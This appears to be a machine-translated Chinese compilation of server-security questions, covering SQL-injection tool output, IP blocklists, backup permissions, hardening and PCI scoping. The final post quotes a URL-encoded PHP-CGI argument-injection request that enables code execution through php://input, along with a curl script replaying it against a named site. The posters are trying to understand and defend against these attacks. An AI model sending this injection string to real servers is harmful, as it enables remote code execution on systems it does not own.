Articles of 安全

数据库检测:MySQL> = 5(自动检测)方法:GETtypes:整数(自动检测)

有人能告诉我哪个渗透testing工具留下了一个看起来像这样的页面吗? DB Detection: MySQL >=5 (Auto Detected) Method: GET Type: Integer (Auto Detected) db_name Table Name Columns table_1 table_2 table_3 table_4 table_5 table_6 table_7 我的一个客户经营的网站最近受到了威胁,作为证据,黑客发送了一份类似上面的报告。 看起来这是由一个自动化工具生成的。 有人能指出这个工具吗,这样我就可以修补正在被利用的漏洞吗?

全球黑名单IP

我知道阻止attacking IPs常用方法很less(例如deny in htaccess )。 除此之外,我们可以得到一个巨大的IP列表来阻止混杂网站,如: http://www.okean.com/antispam/cnkr_htaccess.txt http://www.stopforumspam.com 但是,对于每个项目来说,通过htaccess等来阻止所有这些已知的“不好的”IP,看起来效率很低。 。 所以我想知道: A)如果有任何Global authority应该从互联网上为整个互联网monitor and block这些IP, B)如果项目(网站)可能有任何simple+fast+autoUpdate "list"方法(比如在AdBlockPlus中使用的方法),它们将简单地加载IP来阻塞每天并阻止它们(同时在服务器中保持低成本延迟)。

根据用户限制对SQL Server备份的访问?

假设我在Windows Server 2008 R2 Standard上安装了MS SQL Server 2012 Standard。 这是在Windows域帐户DOMAIN \ sql_user下运行的单个SQL实例。 有两个数据库,db1和db2。 有两个Windows域帐户被授予login权限:DOMAIN \ user1和DOMAIN \ user2。 user1可以访问db1,user2可以访问db2; 每个用户不能访问其他的数据库。 user1具有为db1创build数据库备份和还原数据库备份的权限,user2对于db2具有相同的权限。 假设备份保存到D:\ SQL \ Backups [db1 | db2]。 如何限制这些用户可以备份/恢复的备份文件,以便他们只能看到他们各自的备份文件? 例如,如何限制user1只从D:\ SQL \ Backups \ db1 \中恢复文件,而不是从D:\ SQL \ Backups \ db2 \中恢复文件,反之亦然? 感谢您的任何信息!

强化CentOS 6 web服务器安全性

在云中安装有作为虚拟机的Web服务器。 我自己configuration​​了它,它有两个企业网站。 我没有计划任何其他事情在那里。 所以在公开之前我想检查一下安全漏洞。 请指导我采取最佳做法,清单和审计程序,衡量和评估服务器安全的任何事情。

IPSec:区分安全关联和安全策略的原因

在IPSec中,为什么区分安全关联和安全策略是有意义的?

在Windows Server上不安全地运行Apache作为LOCALSYSTEM?

在我的服务器(Windows Server 2008 R2)上,我安装了几个带有Web界面的程序。 因为我希望能够从局域网外部访问这些Web界面,所以相关的端口在Windows防火墙中打开并在我的路由器中转发。 大多数这些程序使用集成的Apache Web服务器来实现他们的Web前端。 在默认configuration中,此Web服务器安装为在用户帐户“LOCAL-SYSTEM”下作为Windows服务运行。 不过,我想知道,如果我可以通过更改用户帐户这些服务运行提高安全性。 我已经尝试了这种应用程序的混合成功之一:找出用户帐户需要读取和/或写入权限的目录是一个麻烦。 这是值得的吗? 在更受限制的用户帐户下运行Apache是​​否实际上增加了安全性,或者是默认configuration“足够安全”?

如何在服务器端脚本可访问的情况下将敏感数据安全地存储在共享托pipe提供程序上?

我想存储一些敏感的数据在我的托pipe服务提供商,这是一个共享托pipe,可以说例如在MySQL上,我希望它是访问的网站(服务器端语言,如PHP)托pipe在同一个提供商,怎么做我这样做? 你看我不能使用摘要algorithm(MD5,SHA1等),因为我想恢复数据回来在代码中使用它们, 和 我不能使用公私钥这样的东西,因为我必须将这两个密钥存储在服务器上,所以它将与托pipe提供商共享。 有任何想法吗?

堡垒主机符合PCI

零售行业的客户有一个连接到POS服务器的销售点(POS)terminal的networking。 另外,非销售区域的大多数Windows工作站也连接到同一台服务器。 这是因为POS软件只是为公司(库存,采购,会计等)运行一切的大型遗留应用程序的一个模块。 根据我们的PCI审核员(QSA),任何直接连接到持卡人数据环境的系统都被视为范围(不仅仅是存储,处理或传输CC数据的系统)。 问题是如何限制范围,以便数百个与CC数据无关的Windows站点不在PCI DSS的范围内。 此图显示POS和Windows工作站当前如何连接到服务器: 此图显示了它们如何与实施的Bastion主机连接: Windows WS使用Putty或类似的SSH使用基于密码的身份validation的Bastion主机。 Bastion主机上的login脚本或自定义shell使用基于密钥的身份validation自动SSH连接到POS服务器,并且用户透明地进入业务应用程序(用户永远不会获得shell或能力分支到shell)。 但是,在提高安全性方面真正实现了什么呢? 没有堡垒主机:如果Windows WS受到威胁,并且他们获得POS服务器的login密码,他们可以通过SSH连接到它,但是他们仍然只能访问业务应用程序而不能访问shell。 使用堡垒主机:如果Windows WS遭到破坏,他们可以获得login密码给堡垒服务器,他们可以通过SSH连接,但是他们仍然只能进入商业应用程序,无法访问shell。 在这种情况下,我看不到Bastion主机提供了很多额外的安全性。 反馈和/或build议,将不胜感激。

在使用自签名证书的本地主机https连接的地址栏中获取“挂锁”符号是否可能?

我目前在Tomcat中使用一个使用Java Keystore工具的自签名证书来实现SSL的Web应用程序。 我在我的机器上使用web应用程序作为本地主机。 当我访问的url https://localhost:8443 挂锁符号不会出现在地址栏中,但页面会成功加载。 为什么这发生? openSSl能解决这个问题吗?

phppath / php作为URL有奇怪的行为,似乎是一个攻击

警告:以下请求可能会损害您的服务器。 我在apache日志中得到了一些奇怪的东西: "POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 200 276 "-" "-" 意即: POST /phppath/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -n 正如你可以看到这给200,但是当我用curl运行它: <?php $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://aussehenwie.de/%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E"); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, "<?php echo 'hacked'; "); echo curl_exec($ch); curl_close($ch); ?> 它返回一个404.这是一样的,当我从terminal运行它。 为什么? 这个尴尬的URL在做什么?